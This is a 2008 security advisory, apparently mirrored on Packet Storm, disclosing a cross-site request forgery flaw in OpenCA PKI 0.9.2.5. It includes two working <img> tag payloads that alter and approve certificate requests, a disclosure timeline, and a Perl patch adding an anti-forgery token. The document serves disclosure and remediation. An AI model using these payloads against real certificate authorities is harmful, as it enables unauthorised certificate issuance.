exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AKLINK-SA-2008-001.txt

AKLINK-SA-2008-001.txt
Posted Feb 14, 2008
Authored by Alexander Klink | Site cynops.de

OpenCA version 0.9.2.5 suffers from a cross site request forgery vulnerability.

tags | advisory, csrf
advisories | CVE-2008-0556
SHA-256 | c8cc08a802f0472bdd435e3b3e2dacbf30c477ffb9c1ff098f2c5e82d42a1001

AKLINK-SA-2008-001.txt

Change Mirror Download
============================================
||| Security Advisory AKLINK-SA-2008-001 |||
||| CVE-2008-0556 (CVE candidate) |||
============================================

OpenCA - Cross Site Request Forgery (XSRF)
==========================================

Date released: 13.02.2008
Date reported: 12.12.2007
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink@cynops.de
https://www.cynops.de/advisories/CVE-2008-0556.txt
(S/MIME signed:
https://www.cynops.de/advisories/CVE-2008-0556-signed.txt)
https://www.klink.name/security/aklink-sa-2008-001-openca-xsrf.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0556

Vendor: OpenCA LABS
Product: OpenCA PKI
Website: http://www.openca.org/projects/openca/
Vulnerability: Cross Site Request Forgery
Class: remote
Status: unpatched
Severity: high (arbitrary issuance of certificates without the knowledge
and/or consent of a registration officer)
Releases known to be affected: 0.9.2.5, possibly 0.9.2.x (untested)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

The OpenCA PKI Project (v0.9) is a collaborative effort to develop a
robust, full-featured and Open Source out-of-the-box Certification
Authority implementing the most used protocols with full-strength
cryptography world-wide.

Disclaimer: I am actively involved in OpenXPKI, a project with similar
goals that "inherited" most of OpenCA's core developers.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

OpenCA suffers from a typical cross-site request forgery (XSRF) problem.
This means that an authenticated user (a registration officer, for
example) can be manipulated into executing certain activities on the
CA without his knowledge and consent. In a CA, this is especially
problematic as this means an attacker can issue arbitrary certificates
this way.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

As the user is authenticated using a session cookie and the forms
that are used to execute certain activities on the CA are not protected
by some kind of token, one can easily put activities for example into
an <img> tag on another website. If a user has an active session on the
CA, these activities are executed.

Examples:
<img
src="https://hostname/cgi-bin/ra/RAServer?cmd=changeCSR&dataType=NEW_REQUEST&key=57888&SUBJECT_ATTRIBUTE_0_0=CN&SUBJECT_VALUE_0_0=&SUBJECT_ATTRIBUTE_2_0=O&SUBJECT_VALUE_2_0=XSRF+Org&SUBJECT_ATTRIBUTE_1_0=CN&SUBJECT_VALUE_1_0=XSRF+CN&SUBJECT_ATTRIBUTE_3_0=DC&SUBJECT_VALUE_3_0=example&SUBJECT_ATTRIBUTE_4_0=DC&SUBJECT_VALUE_4_0=com&SUBJECT_ALT_NAME_ATTRIBUTE_0=DNS&SUBJECT_ALT_NAME_VALUE_0=xsrfsan"/>
<img
src="https://hostname/cgi-bin/ra/RAServer?head=&cmd=approveCSRnotSigned&signature=&dataType=PENDING_REQUEST&text=-----BEGIN%20HEADER-----%0ASERIAL%20=%2058912%0A-----END%20HEADER-----%0A-----BEGIN%20CERTIFICATE%20REQUEST-----%0AMIIBqjCCARMCAQAwajELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx%0AITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEjMCEGA1UEAxMabXlo%0Ab3N0bmFtZS5leGFtcGxlLmNvbTo0NDMwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ%0AAoGBAJSFtl67sEEZ88wyj0uxgVKlaMl%2FifSNLZPblqlCu%2BhgF3DHhFe80z5DxUk8%0AEbChgri9cVMfhK7IkInxEr6Cuz3Jv651IKX2XL4GsL1ZxZzQ8u3ywClSBVk5jBk7%0Ax7qHw%2FkyU8DNDqIJXY2ZkWAeGty7vMGyPTWRanFO8oIGO%2F7bAgMBAAGgADANBgkq%0AhkiG9w0BAQUFAAOBgQCQhWQrs54Jb8GIn8q3l2OHkmXXM5HV8aDwffwipcGPZHe9%0ANtc3be0xSQDt1q4rEikMKDVR1WTm5FubXs7ZQpDPbVU5t%2BM%2B%2BUuRbUmdP7PYlttR%0AnMg%2BEzZKP4S%2BOp4iZRA8cyqJQaJ63aQ2KzGp%2FBx7nPTjdH%2FnX3vN4tHhC1tKcw%3D%3D%0A-----END%20CERTIFICATE%20REQUEST-----%0A&key=58912"/>

Some guessing of valid serials is needed in these cases, but this can be
ignored if the user has access to the public frontend, as he can then
create a certificate request himself that can be changed and approved
using XSRF. Serials are (more or less) consecutive, so guessing is
relatively easy.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 12.12.2007: Reported bug to the openca-core mailing list (the private
mailing list of core developers) via Martin Bartosch
* 17.12.2007: Martin Bartosch forwards the mail directly to the project
maintainer, Massimiliano Pala
* 02.01.2008: Asked for a contact to a release coordinator on the
openca-devel mailing list
* 01.02.2008: Sent patch to openca-core and Massimiliano Pala with the
announcement to release advisory and patch if no reply is
received until February 10th

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Apply the following patch. It introduces an XSRF protection token
parameter that is added to all internal links and forms which consists
of a SHA1 hash of the session ID that is stored in the cookie. The
server side compares if the parameter is set correctly if needed and
complains if it is not. As no help from the current OpenCA developers
was available to us, this patch is not very well tested. It works for
us - use at your own risk.
Note that it introduces a dependency to Digest::SHA1, but this should
be included with the base modules in modern Perl distributions.

diff -ru OpenCA-0.9.2.5.orig/src/modules/openca-ac/AC.pm
OpenCA-0.9.2.5/src/modules/openca-ac/AC.pm
--- OpenCA-0.9.2.5.orig/src/modules/openca-ac/AC.pm 2008-01-14
15:05:16.000000000 +0100
+++ OpenCA-0.9.2.5/src/modules/openca-ac/AC.pm 2008-01-15
10:23:11.000000000 +0100
@@ -34,7 +34,7 @@
use OpenCA::Log::Message;

use FileHandle;
-
+use Digest::SHA1 qw( sha1_hex );

my $is_ldaps;

@@ -781,6 +781,7 @@
## return undef;
## }

+ my @not_vulnerable_cmds = qw( genMenu serverInfo getStaticPage );
if (not $self->getSession ()) {
if (not $self->login ()) {
return undef;
@@ -795,6 +796,11 @@
$self->{journal}->{login}->{role} = $self->{ident}->{role};
$self->{journal}->{session_id} = $self->{session}->getID();
$self->{journal}->{session_type} = "cookie";
+ if (defined $self->{cgi}->param('cmd') &&
+ (! grep { $_ eq $self->{cgi}->param('cmd'} }
@not_vulnerable_cmds)) {
+ # only the above commands should be called after a login
+ return undef;
+ }
return $h;
}
} else {
@@ -804,6 +810,25 @@
$self->stopSession;
return $self->checkIdent;
}
+
+ # XSRF checks
+ my $potentially_vulnerable;
+ if (defined $self->{cgi}->param('cmd')) {
+ $potentially_vulnerable = 1;
+ }
+ if (grep {$_ eq $self->{cgi}->param('cmd')} @not_vulnerable_cmds) {
+ $potentially_vulnerable = 0;
+ }
+
+ if ($potentially_vulnerable &&
+ ($self->{cgi}->param('xsrf_protection_token')
+ ne sha1_hex($self->{session}->getID()))) {
+ # potential XSRF attack
+ $self->debug('Potential XSRF attack');
+ $self->debug('XSRF token: ' .
$self->{cgi}->param('xsrf_protection_token'));
+ $self->debug('SHA1 hash of session ID: ' .
sha1_hex($self->{session}->getID()));
+ return undef;
+ }
return $self->{session}->update();
}

diff -ru OpenCA-0.9.2.5.orig/src/modules/openca-ui-html/HTML.pm
OpenCA-0.9.2.5/src/modules/openca-ui-html/HTML.pm
--- OpenCA-0.9.2.5.orig/src/modules/openca-ui-html/HTML.pm 2008-01-14
15:05:16.000000000 +0100
+++ OpenCA-0.9.2.5/src/modules/openca-ui-html/HTML.pm 2008-01-15
09:07:17.000000000 +0100
@@ -26,6 +26,7 @@
use CGI;
use Locale::Messages (':locale_h');
use Locale::Messages (':libintl_h');
+use Digest::SHA1 qw( sha1_hex );

use FileHandle;
our ($STDERR, $STDOUT);
@@ -482,6 +483,8 @@
}
$page .=
' </table>'."\n";
+ my $xsrf_protection_token = sha1_hex($self->{CGI}->param('CGISESSID'));
+ $keys->{HIDDEN_LIST}->{xsrf_protection_token} = $xsrf_protection_token;
if (exists $keys->{HIDDEN_LIST})
{
my $list = $keys->{HIDDEN_LIST};
@@ -502,11 +505,22 @@
' </form>'."\n".
' </body>'."\n".
'</html>'."\n";
+ $page = $self->addXSRFProtectionTokenToLinks($page);
$self->sendContentType();
print $STDOUT $page;
return 1;
}

+sub addXSRFProtectionTokenToLinks {
+ my $self = shift;
+ my $page = shift;
+ my $session_id = $self->{CGI}->param('CGISESSID');
+ my $xsrf_protection_token = sha1_hex($session_id);
+
+ $page =~
s/(href="[a-zA-Z\/\-]*\?cmd=[^"]+)/$1;xsrf_protection_token=$xsrf_protection_token/g;
+ return $page;
+}
+
sub libSendMenu {

my $self = shift;
@@ -542,6 +556,7 @@
' </body>'."\n".
'</html>';

+ $page = $self->addXSRFProtectionTokenToLinks($page);
print $STDOUT $page;
return 1;
}
@@ -630,6 +645,7 @@
' </form>'."\n".
' </body>'."\n".
'</html>'."\n";
+ $page = $self->addXSRFProtectionTokenToLinks($page);
print $STDOUT $page;
return 1;
}

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery and patch)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks:

- Jürgen Brauckmann (DFN-CERT) for providing helpful input during the
patch development

--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de
mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe | | Martin Bartosch


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close